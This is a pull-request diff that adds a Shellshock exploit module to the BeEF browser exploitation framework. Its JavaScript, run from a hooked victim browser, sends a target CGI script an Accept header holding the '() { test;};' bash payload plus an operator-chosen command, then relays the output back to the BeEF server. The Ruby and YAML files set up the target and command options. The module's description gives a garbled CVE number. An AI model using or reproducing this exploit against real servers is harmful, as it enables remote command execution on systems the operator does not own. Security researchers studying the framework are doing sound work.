Merge pull request #1058 from radoen/master

shell shocked BeEF module

modules/exploits/shell_shocked/command.js

@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function () {
+
+    try {
+        var target = "<%=@Target%>";
+        var command = "<%=@Bash_Command%>";
+        var xhr = new XMLHttpRequest();
+        xhr.open("GET", target, true);
+        xhr.onload = function () {
+        };
+        xhr.onreadystatechange = function () {
+            if (xhr.readyState == 4 && xhr.status == 200) {
+                beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+xhr.response);
+            }
+        }
+        xhr.setRequestHeader("Accept", "() { test;};echo \"Content-type: text/plain\"; echo; echo; " + command);
+                xhr.send(null);
+                }
+                catch (e){
+                    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result= Something wrong "+e.message);
+    }
+                });
+

modules/exploits/shell_shocked/config.yaml

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        Shell_shocked:
+            enable: true
+            category: "Exploits"
+            name: "Shell Shock"
+            description: "Attempt to use vulnerability CVE-2014-627 to execute arbitrary code"
+            target:
+                working: ["All"]

modules/exploits/shell_shocked/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Shell_shocked < BeEF::Core::Command
+
+  def self.options
+    return [
+        {'name' => 'Target', 'description' => 'Vulnerable cgi script path', 'ui_label' => 'Target', 'value' => 'http://127.0.0.1/cgi-bin/test.cgi'},
+        {'name' => 'Bash_Command', 'description' => 'the command to execute', 'ui_label' => 'Bash Command', 'value' => '/bin/ping -c 3 www.google.it'}
+    ]
+  end
+
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end